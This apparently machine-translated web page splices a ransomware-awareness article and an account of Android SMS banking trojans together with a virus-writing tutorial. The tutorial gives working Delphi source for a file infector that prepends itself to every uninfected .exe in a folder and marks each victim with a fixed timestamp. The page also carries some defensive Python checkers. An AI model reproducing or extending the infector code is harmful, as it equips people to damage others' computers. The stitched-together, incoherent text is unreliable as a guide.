Viruses that are sent to phones. Hacking by someone else's hands


26.01.2021

Call the admin exorcists, guys! The chief accountant caught a powerful virus and everything is gone! A very, very common situation, rooted in the human factor, fresh virus trends and the dedication of hackers. Indeed, why dig into someone else's software yourself when you can rely on the company's employees to do it for you.

Yes, the products of large public and private firms are constantly hacked, even though hundreds of experienced people work to create and maintain them.

And an ordinary person has nothing to set against hackers. At the same time, nobody needs one lonely account: the hackers' goal is to collect a large database of potential victims and work through it with "chain letters", spam or viruses. And we ourselves hand out all our personal and public information left and right.

Latest viral trends

A distinctive feature of all fresh viruses and hacker techniques is that they interact with a person, not a system. That is, the victim starts the process. This is called "social engineering": a method of gaining illegal access to information that exploits the characteristics of human psychology. And where attackers once had to turn into real detectives, tracking down their targets, communicating with them, sometimes even getting a job at the company they were hacking, now they can say thanks to social networks, which have greatly simplified and accelerated the collection of information.

After scouring your target's VK, Twitter, FB and Instagram, you can build an exact profile of the person, with phone number, e-mail, names of parents and friends, and other details. And all of it is free and voluntary: help yourself, dear!

And if fraudsters gain access to the corporate mail of one of your employees, spam mailings threaten not only everyone inside the company but also your customers. Or else the hackers will permanently disable the employee's computer by sending some kind of "report" to the mailbox.

Hackers plan attacks on those who work with valuable information: secretaries, managers, accountants, HR staff.

Since recovering documents, systems and sites or obtaining passwords will cost you a pretty penny, you need to understand what we are dealing with. So that all these "social engineers" cannot cash in on you, we will analyze one of the fresh virus schemes.

Ransomware

The ransomware virus spreads via e-mail under the guise of serious documents: subpoenas, invoices, requests from the tax office. To avoid installing it yourself, you need to look both ways. Our technicians analyzed one such virus specifically so that we can show what to look for:

We follow the hands of these magicians:

  • Threatening subject line: "Notice to Appear in Court". The guys are trying to intimidate the user and force them to open the letter.
  • Sender address: [email protected]. It clearly shows that this is not an official letter but a spammer or hacker.
  • The letter's archive attachment. Inside is a file that should immediately raise the alarm: its name includes .doc, but the extension is .js, so the virus is disguising itself as a Word document.

Attention! If a computer has been infected with ransomware, then with 95% probability the information is lost forever. After the malicious file is downloaded and launched, it makes a request to a remote server, from which the virus code is downloaded. All data on the computer is then encrypted with a random sequence of characters.

To "decode" the files you need a key that only the hacker has. The fraudster promises to decrypt the information for a certain sum, but it is far from certain that this will happen. Why bother? It is much easier to leave a person with no money and no data: contracts, deeds, orders, any valuable and sensitive information. So make backups of especially important documentation and you will sleep more peacefully. In this situation, this is your only 100% virus protection.

Pay attention to the features above and you can prevent dangerous cases of blocked computers and deleted information. In any case, eliminating the consequences of critical vulnerabilities will be much more expensive than taking precautions.

Therefore, here are 6 more tips for detecting viruses and preventing infection:

1. Update your operating system and programs regularly. Important updates, which are installed automatically by default, can be disabled. But you shouldn't, as new versions often close discovered holes in software security.

2. Install an antivirus and update its virus database regularly. 100 thousand new viruses appear every day!

3. Enable the display of file extensions: Control Panel \ Folder Options \ View \ Advanced settings, uncheck the option "Hide extensions for known file types" and click OK. This ensures you always see the actual file extension. Most often, disguised viruses look like this: filename.doc.js and filename.pdf.exe. The real file extensions are js and exe, and everything in front of them is part of the file name.

4. Back up important files: work documents and photos. Choose the backup frequency according to how often the files change. For backup storage you can use a cloud service if it allows you to revert to old versions of files and set up manual synchronization; then, if the computer is infected, the virus will not reach the cloud. We also recommend keeping a copy of important data in an archive. Most viruses cannot penetrate an archive, and all archived information is restored after the computer is disinfected.

5. Improve the professional literacy of your specialists! As we said before, hackers tailor their attacks to our psychology and are constantly improving their techniques. Don't think that only someone outside your company and team will click, upload or enter their details. Anyone can get caught; the only task is to pick the right hook for the person. So train your employees: individually, as a team, in a playful way, any way at all!

6. Watch carefully for letters in the mail, messages in corporate messengers and any other incoming information. Check senders' e-mail addresses, attachments and the content of letters. Most viruses have to be started manually in order to harm your computer.
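The three tell-tale signs from the analyzed letter (threatening subject, non-official sender, a script named like a Word document inside an archive) and tip 3's double-extension rule can be turned into a small mail-triage check. This is an added example, not code from the original article or from hecc.ru; the extension lists beyond .js and .exe, the keyword list, the sender address and the "official" domain are constructed assumptions.

```python
from email.utils import parseaddr

# Extensions Windows will execute or run as a script. The page names .js and .exe;
# the rest are well-known additions and an assumption of this example.
EXECUTABLE_EXTS = {"exe", "js", "jse", "vbs", "vbe", "wsf", "scr", "bat", "cmd", "com", "pif", "hta"}
# Extensions a lure wants the user to notice (the ".doc" in filename.doc.js).
DOCUMENT_EXTS = {"doc", "docx", "pdf", "xls", "xlsx", "rtf", "txt"}
ARCHIVE_EXTS = {"zip", "rar", "7z"}
# Words typical of the intimidating subjects the page describes (court, invoices, tax).
THREAT_WORDS = ("court", "subpoena", "invoice", "tax", "urgent", "notice")


def real_extension(filename: str) -> str:
    """The extension Windows actually honours: the last one, lowercased."""
    name = filename.lower()
    return name.rsplit(".", 1)[1] if "." in name else ""


def attachment_findings(filename: str) -> list:
    """Flag executable attachments and the filename.doc.js / filename.pdf.exe disguise."""
    findings = []
    ext = real_extension(filename)
    parts = filename.lower().split(".")
    if ext in EXECUTABLE_EXTS:
        findings.append(f"{filename}: real extension '{ext}' is executable")
        if len(parts) >= 3 and parts[-2] in DOCUMENT_EXTS:
            findings.append(f"{filename}: disguised as a .{parts[-2]} document")
    elif ext in ARCHIVE_EXTS:
        findings.append(f"{filename}: archive, inspect its contents before opening")
    return findings


def sender_findings(from_header: str, official_domains: set) -> list:
    """Compare the real address in From: with the domains a legitimate sender would use."""
    _display, addr = parseaddr(from_header)
    domain = addr.rpartition("@")[2].lower()
    if domain not in official_domains:
        return [f"sender domain '{domain}' is not an official domain"]
    return []


def triage_message(from_header: str, subject: str, attachments: list, official_domains: set) -> list:
    """Return every reason this message deserves a second look; an empty list means nothing found."""
    findings = sender_findings(from_header, official_domains)
    if any(word in subject.lower() for word in THREAT_WORDS):
        findings.append(f"threatening subject: '{subject}'")
    for name in attachments:
        findings.extend(attachment_findings(name))
    return findings


if __name__ == "__main__":
    # Constructed sample modelled on the page's lure: court notice, free-mail sender,
    # archive containing a script named like a Word document.
    for line in triage_message(
        "Court Clerk <clerk12345@example-freemail.test>",   # constructed address
        "Notice to Appear in Court",
        ["Notice_to_Appear.zip", "Notice_to_Appear.doc.js"],
        official_domains={"courts.example.gov"},            # assumed official domain
    ):
        print("-", line)
```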

We really hope you are reading this article for preliminary information and not because everything is already bad. We wish you never to encounter total uncontrolled spam, documentation that vanishes in six months and the other pleasant consequences of caught viruses. Follow the six steps above, keep your eyes open, and may your information remain confidential!

Users are not always able to recognize a virus on their mobile phone and, accordingly, cannot remove the malicious program or take any action before the virus gains access to personal data.

At the moment Android smartphones are considered the most vulnerable. A new virus has appeared that spreads via SMS on Android.

On smartphones running open-source software, which is what the Android operating system is, new viruses spread with incredible speed.

Now they have changed. Previously they only went after the money on mobile phone accounts, but today they target bank cards and all the funds available in the Internet bank. Fraudsters are primarily interested in smartphones with support for the Mobile Bank service. It allows them to steal money from the victim's account to the fraudster's number. To do this, they send a virus via SMS to Android.

How scammers work

The first such virus became active in early summer 2017. The danger is that the Trojan operates remotely on the Android smartphone.

Attackers send SMS to the desired number, so to identify the presence of this virus on their mobile gadget, smartphone owners should pay attention to an increase in the number of SMS messages costing 100 rubles. As a result, a multiple of 100 is withdrawn from the smartphone owner's mobile account.

To make substantial money, the attacker has to send several SMS Trojans from his victim's number. After all, he is not the only one working in this fraudulent chain.

The Trojan settles in the victim's gadget and sends SMS messages from the victim's number to the scammers' "expensive" number. And it is for these SMS messages addressed to this "expensive" number that the victim is charged 100 rubles for each unauthorized SMS message.

Intermediaries in this scheme can be a telecom operator, a provider and other partners who may not know about the fraudsters' tricks. To cover all expenses and make money, the attacker must withdraw at least 1,000 rubles from each number.

At the same time, we cannot rule out that smartphone owners will complain to their operator about the theft of money. Then the operators take countermeasures to prevent such fraud. For example, they can require additional confirmation before money is debited, and the like. In such a situation, attackers are forced to look for new ways to defraud.

Thanks to these factors, another Trojan appeared. This Trojan-SMS representative also executes commands received from a remote server.

The new virus is more flexible and navigates perfectly in any conditions, taking into account the mobile operator's barriers and even the state of the subscriber's account and the time of transactions.

How the virus works

The new virus is dormant; it has no autonomy. Even after getting onto a smartphone, it does not show itself in any way. To make it work, a remote command from the phone's "owner", the operator of the Trojan, is needed.

For this the so-called POST request is used: a request in which the web server accepts data enclosed in the message body for storage. It is often used, for example, to upload a file.

A POST request makes it possible to establish a connection with a remote server and receive the corresponding command, after which the Trojan starts sending expensive SMS messages from its victims' numbers to the scammers' number.

How does the new Trojan work? For example, the program automatically sends SMS messages containing the single word "BALANCE" to a number that supports "Mobile Bank".

By sending an SMS message from a short number, fraudsters can thus check whether the victim's number is linked to a bank account and what the state of the account is.

Real life examples

For example, Sberbank has a number from which its messages are sent: 900. When a message "BALANCE" (or, perhaps, in Russian, "balance") arrives from sender 900, the phone's owner, trusting Sberbank and sure that the message is from the bank, opens it and replies, wanting to know what happened to the balance. Thus the scammers receive an answer to their SMS, which for them means that a bank card is attached to the phone. Moreover, it becomes clear to them that this card can be controlled with SMS commands, which is part of the Mobile Banking service. And then, as they say, it is "a matter of technique".

One of my acquaintances recently received messages from the short number 4-74-1, which is registered to the Sberbank mobile bank, with the text "The service is not available, please try later." For obvious reasons she did not reply, already knowing about the possible threats. Obviously, these are the same scammers disguising themselves as the mobile bank, trying to gauge her reaction and determine whether a mobile bank is installed on her smartphone.
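The two traces this section describes, an outgoing "BALANCE" probe to the bank's short number that the user never typed and bursts of outgoing SMS billed at 100 rubles each, can be checked for in an itemised SMS log. This is an added example, not code from the original article: the log layout, the 7733 short code and the burst threshold are constructed assumptions; only 900, the word BALANCE and the 100-ruble unit come from the page.

```python
import csv
import io
from collections import defaultdict

# Constructed itemised SMS log, one "timestamp,direction,number,text,cost_rub" per line.
# The layout is an assumption of this example; the 7733 short code is made up.
SAMPLE_LOG = """\
2017-06-03 09:12:00,out,900,BALANCE,0
2017-06-03 09:12:07,in,900,"Balance: 15240.00 RUB",0
2017-06-03 09:13:02,out,7733,ACT,100
2017-06-03 09:13:40,out,7733,ACT,100
2017-06-03 09:14:15,out,7733,ACT,100
2017-06-03 09:15:00,out,7733,ACT,100
2017-06-03 09:15:44,out,7733,ACT,100
2017-06-03 10:02:00,out,+79001234567,see you at 7,0
"""

BANK_SHORT_NUMBERS = {"900"}   # Sberbank's 900, named on the page
PROBE_TEXTS = {"BALANCE"}      # the one-word probe the page describes
PREMIUM_UNIT_COST = 100        # rubles per "expensive" SMS, per the page
BURST_COUNT = 3                # outgoing premium SMS before we call it a burst (assumption)


def parse_log(text: str) -> list:
    """Parse the log into (timestamp, direction, number, text, cost) tuples."""
    rows = []
    for ts, direction, number, msg, cost in csv.reader(io.StringIO(text)):
        rows.append((ts, direction, number, msg, int(cost)))
    return rows


def analyse(rows: list) -> dict:
    """Look for a BALANCE probe sent by the phone to a bank short number and for
    outgoing SMS billed in multiples of the premium unit cost. A BALANCE the user
    really typed is legitimate, so the probe list is a lead to confirm, not a verdict."""
    premium = defaultdict(lambda: {"count": 0, "rubles": 0})
    probes = []
    for ts, direction, number, msg, cost in rows:
        if direction != "out":
            continue   # only messages the phone itself sent are of interest
        if number in BANK_SHORT_NUMBERS and msg.strip().upper() in PROBE_TEXTS:
            probes.append((ts, number))
        if cost > 0 and cost % PREMIUM_UNIT_COST == 0:
            premium[number]["count"] += 1
            premium[number]["rubles"] += cost
    total = sum(v["rubles"] for v in premium.values())
    burst = any(v["count"] >= BURST_COUNT for v in premium.values())
    return {"bank_probes": probes, "premium_numbers": dict(premium),
            "premium_total_rub": total, "suspicious": bool(probes) or burst}


if __name__ == "__main__":
    print(analyse(parse_log(SAMPLE_LOG)))
```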

Classification

HLLO: High Level Language Overwrite. Such a virus overwrites the program with its own body, i.e. the program is destroyed, and when the user tries to start the program, the virus is launched instead and "infects" further.

HLLC: High Level Language Companion. Most of these viruses belong to hoary antiquity (8-10 years ago), when users had DOS and were very lazy. These viruses look for a file and, without changing it, create a copy of themselves with the extension .COM. If a lazy user types only the file name on the command line, DOS looks for the COM file first, launching the virus, which first does its job and then launches the EXE file. There is another, more modern (7 years ;)) modification of HLLC: the virus renames the file, keeping the name but changing the extension, from EXE to, say, OBJ or MAP, and replaces the original file with its own body. I.e. the user launches the virus, which, after carrying out its act of reproduction, launches the required program: everyone is happy.

HLLP: High Level Language Parasitic. The most advanced. They attach their body to the file from the front (the virus starts first, then restores the program and starts it) or from behind; in that case a jmp near to the virus body is written into the program's header, so the virus still runs first.

We can leave the program itself unchanged; then it will look like this:

What MZ is, I think you guessed 🙂 These are the initials of your beloved Mark Zbikowski, which he modestly placed in the signature of the exe file 🙂 And I put them here just so that you understand: the infection works on the principle of copy /b virus.exe program.exe, and there are no special tricks here. Not now. But you and I will make some, be healthy :). Well, for example: you can encrypt the first 512 or more bytes of the original program with any algorithm you know (XOR/XOR, NOT/NOT, ADD/SUB), and then it will look like:

In this case the structure of the infected file will not be so obvious. I am not going on at such length here (in the classification, I mean) for nothing: the parasitic algorithm is used by 90% of modern viruses, regardless of their distribution method. Okay, let's move on:

Network virus. Can be any of the above. It differs in that its distribution is not limited to one computer; this infection somehow climbs through the Internet or a local network to other machines. I think you regularly pull 3-4 such friends out of your mailbox; here's an example of a network virus. And once it gets onto someone else's computer, it infects files in an arbitrary way, or does not infect AT ALL.

Macro viruses, script viruses, IRC viruses. I put them in one group because they are viruses written in languages built into applications (MSOffice :)), scripts (your favorite VBS rules here) and IRC scripts. Strictly speaking, as soon as a sufficiently powerful (and/or leaky) scripting component appears in an application, viruses immediately start being written in it 😉 By the way, macro viruses are very simple and easily detected by heuristics.

Coding

Got it 🙂 Come on, run Delphi, kill all the windows and wipe all the nonsense from the project window. That is, wipe everything in general 🙂 We will only work with the DPR, containing:

program EVIL_VIRUS;
USES WINDOWS, SYSUTILS;
begin
end;

The logic of the virus, I think you already understood from the classification: restore and run the program -> wait for it to finish -> erase the "used" file (I forgot to say: we DO NOT CURE the infected program; we transfer the original code to a side file and run that. EXAMPLE: infected file NOTEPAD.EXE. Create a file _NOTEPAD.EXE in the same directory with the original code and run that one) -> search for an uninfected file and infect it. That's all 🙂 The basic design of the virus looks like this.

Now declare the following variables and constants for your mighty brain:

VaR VirBuf, ProgBuf, MyBuf: array of char;
SR: TSearchRec;
My, pr: File;
ProgSize, result: integer;
PN, st: String;
si: Tstartupinfo;
p: Tprocessinformation;
infected: boolean;
CONST VirLen: longint = 1000000;

The first line is dynamic arrays, into which we will write the body of the virus and the program, respectively. The SR variable will hold the characteristics of the found file, the candidate for infection (I hope you are familiar with the FindFirst and FindNext procedures, because it gets worse further on ;)). My and Pr are the file we were started from and the side file with the original program code (I already wrote about it above). result is the result of FindFirst; it must be zero. ProgSize is the size of the program code. The rest is clear from what follows, except that infected is the flag marking the found file as infected and VirLen is the length of the virus code, which you will learn only after the wedding. Ugh, I meant after compilation. That is, you compile, change the value of the constant in the source code and recompile.
We code further 🙂 Here you see the code responsible for restoring and launching the infected program:

SetLength(virbuf, VirLen);
AssignFile(my, ParamStr(0));
st := paramstr(0);
St := st + #0;
CopyFile(@st, 'c:\windows\program.exe', false);
IF FileSize(my) > VirLen then
begin
// Run the program
AssignFile(my, 'c:\windows\program.exe');
Reset(my);
ProgSize := FileSize(my) - VirLen;
BlockRead(my, virbuf, virlen);
SetLength(progbuf, pRogSize);
BlockRead(my, progbuf, progSize);
CloseFile(my);
PN := '_' + ParamStr(0);
AssignFile(pr, PN);
ReWrite(pr);
BlockWrite(pr, progbuf, progSize);
CloseFile(pr);
FillChar(Si, SizeOf(Si), 0);
with Si do
begin
cb := SizeOf(Si);
dwFlags := startf_UseShowWindow;
wShowWindow := 4;
end;
PN := PN + #0;
Createprocess(nil, @PN, nil, nil, false, Create_default_error_mode, nil, nil, si, p);
Waitforsingleobject(p.hProcess, infinite);
// Launched, the program worked. Let's erase it 🙂
ErAsE(pr);
Erase(my);

Everything here, in principle, is simple and understandable, except why I transferred the entire infected file to the Windows directory and what lines 3 to 5 inclusive are doing. I did this because reading from a running file is awkward and is possible only with the CreateFile and ReadFile WinAPI functions. I will tell you about WinAPI coding later; for now I cover only the basics, in Delphi.

Those lines are the conversion of a string to PChar by the folk method, since we are now fighting for every byte of code. Another point: I acted incorrectly by hard-coding the path c:\windows. Better use the GetWindowsDirectory procedure and find out for sure 🙂 Everything else is clear without any comments (unless you skipped computer science ;)), go ahead:

result := FindFirst('*.exe', faAnyFile, sr);
WHILE Result = 0 DO
begin
// Check for lice
Infected := false;
IF DateTimeToStr(FileDateToDateTime(fileage(sr.name))) = '08/03/98 06:00:00' then infected := true;
// Checked!
IF (infected = false) and (sr.name <> paramstr(0)) then
begin
AssignFile(my, sr.Name);
ReWrite(my);
BlockWrite(my, virbuf, virlen);
BlockWrite(my, progbuf, sr.Size);
CloseFile(my);
FileSetDate(sr.Name, DateTimeToFileDate(StrToDateTime('08/03/98 06:00:00')));
end;
end;

// If the virus is launched "clean", i.e. not from an infected program, then we end
end else halt;

What does your keen eye see here? That's right, the FindFirst procedure searches for the given victim (any exe file in the current directory) and transfers its characteristics to the SR variable. Then you need to check it for contamination. This is done in an original way: when infected, the file is assigned a specific date and time, and any file with those characteristics is considered infected. Everything else is again obscenely simple, so I move smoothly on to the conclusion 🙂
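From the defender's side, both properties described above are exactly what a scanner keys on: the HLLP layout (virus body of VirLen bytes followed by the untouched original, so a second MZ/PE header sits at offset VirLen) and the fixed infection timestamp used as a marker. The following is an added example, not code from the article; the minimal PE images are constructed fixtures, and reading "08/03/98" as 8 March 1998 (day/month/year) is an assumption.

```python
import struct
from datetime import datetime

MZ = b"MZ"
PE_SIG = b"PE\0\0"
# Infection marker from the page's code: infected files are stamped "08/03/98 06:00:00".
# Read as a day/month/year date this is 8 March 1998 (an assumption of this example).
MARKER_MTIME = datetime(1998, 3, 8, 6, 0, 0)


def dos_header_points_to_pe(data: bytes, offset: int) -> bool:
    """True if an MZ header at `offset` has an e_lfanew that lands on a PE signature."""
    if data[offset:offset + 2] != MZ or offset + 0x40 > len(data):
        return False
    e_lfanew = struct.unpack_from("<I", data, offset + 0x3C)[0]
    pe_at = offset + e_lfanew
    return data[pe_at:pe_at + 4] == PE_SIG


def embedded_executables(data: bytes) -> list:
    """Offsets of every valid MZ/PE header after the one at offset 0. A prepending
    infector (copy /b virus.exe program.exe) leaves the original program's header
    intact at offset VirLen, which is what this finds."""
    found = []
    pos = data.find(MZ, 1)
    while pos != -1:
        if dos_header_points_to_pe(data, pos):
            found.append(pos)
        pos = data.find(MZ, pos + 1)
    return found


def scan(data: bytes, mtime: datetime = None) -> dict:
    """Combine the structural check with the timestamp marker the page's code sets."""
    verdict = {"valid_pe": dos_header_points_to_pe(data, 0),
               "embedded_at": embedded_executables(data),
               "marker_mtime": mtime == MARKER_MTIME}
    verdict["suspicious"] = bool(verdict["embedded_at"]) or verdict["marker_mtime"]
    return verdict


def fake_pe(payload_len: int) -> bytes:
    """Constructed minimal image: MZ stub, e_lfanew = 0x40, PE signature, zero padding."""
    header = bytearray(0x40)
    header[:2] = MZ
    struct.pack_into("<I", header, 0x3C, 0x40)
    return bytes(header) + PE_SIG + b"\0" * payload_len


if __name__ == "__main__":
    clean = fake_pe(300)
    layered = fake_pe(1000) + clean   # a 1068-byte image with the clean one appended
    print(scan(clean))
    print(scan(layered, MARKER_MTIME))
```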

Conclusion

So we have coded our first virus. So far it only knows how to infect files in the current directory (although I'm sure you can easily upgrade it ;)) and knows nothing about other directories or the Internet. Don't despair, we will quickly teach it that. Play around with these lines for now and wait for the next article.

Appendix

I would venture to give you a description of all the procedures used in the article. This will help you look them up in the help and prepare for coding serious viruses using WinAPI.

AssignFile - no equivalent in WinAPI - associates a file with a variable of type File or TextFile

Reset - analogs: _lopen and CreateFile - opens an existing file and sets the read position to the beginning

ReWrite - _lcreate and CreateFile - creates a new file and sets the read position to the beginning. If you feed ReWrite an existing file, its contents will be reset

BlockRead - _lread and ReadFile - reads a certain amount of data from a file into a buffer

BlockWrite - _lwrite and WriteFile - respectively, writes data to a file

SeekFile - _llseek and SetFilePointer - moves the read/write position in an open file

CloseFile - _lclose and CloseHandle - closes an open file

Erase - DeleteFile - deletes a file

FindFirst - FindFirstFile - searches for a file by criteria

FindNext - FindNextFile - finds the next file

© 2021 hecc.ru - News of computer technologies